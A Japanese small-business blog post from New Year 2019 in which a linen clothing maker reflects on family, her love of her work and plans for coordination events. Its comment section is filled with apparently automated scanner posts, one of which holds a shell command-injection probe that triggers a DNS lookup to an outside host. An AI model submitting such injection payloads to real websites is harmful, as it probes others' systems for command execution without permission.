謹賀新年

写真がないので似顔絵です(笑)
写真がないので似顔絵です(笑)

あけましておめでとうございます。

coco*chiの郡山真喜子です。



2019年の幕開け

みなさん、どんなことを思いながら迎えられましたか?


妻であり嫁であり、

母であったり娘でもあり、

はたまた姉、妹、叔母、祖母でもあるかもしれません。

色んな役割を担っているわたし達。



、、、休みがない(笑)


(。´Д⊂)



とはいえわたしは、お正月は家族でのんびり過ごしてしています。

すごろくをしたり、今年も福笑いを作って遊びました。

子供達が眠ってからは夫婦でちょっとお酒を飲んだり。


けれどやっぱり、ついつい生地を選んだりパソコンを触ってDMのデザインを考えたり。

仕事が頭から離れません(笑)

でもそれが嫌じゃないから、根っから好きなんだなー、と思います。



Happy*cocoとしては、今年は益々コーディネートの提案に力を入れていきたいな、と勝手に考えています。


30代後半~40代に突入したわたし、そして50代の千春さん。

せっかくだから、小物やアクセサリー、差し色を変えて、30代~60代まで着られる、リネン素材を使ったコーディネート。

1つのアイテムを10年着ることを目標に、コーディネート案をたくさん作りたいなあと思っています。


そしてそれを、フォトブックにできたらなあ、、、



そしてcoco*chiとしては、

少し、絵を描く時間を作りたいと思っています。


それから、自分の服を自分で作ること。

これはずっと続けていきたい。



こうして、好きなことをめいっぱいできる環境にいること。

見守ってくれる、家族に。

そして、こんな半人前のわたし達を、

最高にHAPPYにしてくれるお客様に。


もちろん、一緒に笑って泣いてくれる、千春さんとRieちゃんに。


感謝を忘れない一年にしたいと思います。


m(_ _)m




1月15日(火)のHappy*cocoはおかげさまでほぼ満席になりました!

2月5日(火)はstudio HARUGAさまにて

2月12日(火)は工房にて

まだご予約可能です◎


ぜひ、コーディネートのご相談だけでも、

おいでください

(*´-`)



本年も、Happy*cocoを、

どうぞ、よろしくお願い申し上げます。



愛を込めて。














コメントをお書きください

コメント: 18
  • #1

    tsSLAueP (金曜日, 20 8月 2021 20:35)

    1

  • #2

    tsSLAueP (金曜日, 20 8月 2021 20:38)

    1

  • #3

    tsSLAueP (金曜日, 20 8月 2021 20:39)

    1

  • #4

    tsSLAueP (金曜日, 20 8月 2021 20:39)

    1

  • #5

    tsSLAueP (金曜日, 20 8月 2021 20:39)

    $(nslookup hitgqjzduosyrdd0cb.bxss.me||perl -e "gethostbyname('hitgqjzduosyrdd0cb.bxss.me')")

  • #6

    tsSLAueP (金曜日, 20 8月 2021 20:39)

    1

  • #7

    tsSLAueP (金曜日, 20 8月 2021 20:40)

    1

  • #8

    tsSLAueP (金曜日, 20 8月 2021 20:40)

    1

  • #9

    tsSLAueP (金曜日, 20 8月 2021 21:46)

    1

  • #10

    HcPcEgmp (火曜日, 21 12月 2021 04:18)

    1

  • #11

    HcPcEgmp (火曜日, 21 12月 2021 04:19)

    1

  • #12

    HcPcEgmp (火曜日, 21 12月 2021 04:20)

    1

  • #13

    HcPcEgmp (火曜日, 21 12月 2021 04:20)

    1

  • #14

    HcPcEgmp (火曜日, 21 12月 2021 04:20)

    1

  • #15

    HcPcEgmp (火曜日, 21 12月 2021 04:21)

    1

  • #16

    HcPcEgmp (火曜日, 21 12月 2021 04:50)

    1

  • #17

    HcPcEgmp (火曜日, 21 12月 2021 04:51)

    1

  • #18

    HcPcEgmp (火曜日, 21 12月 2021 05:29)

    1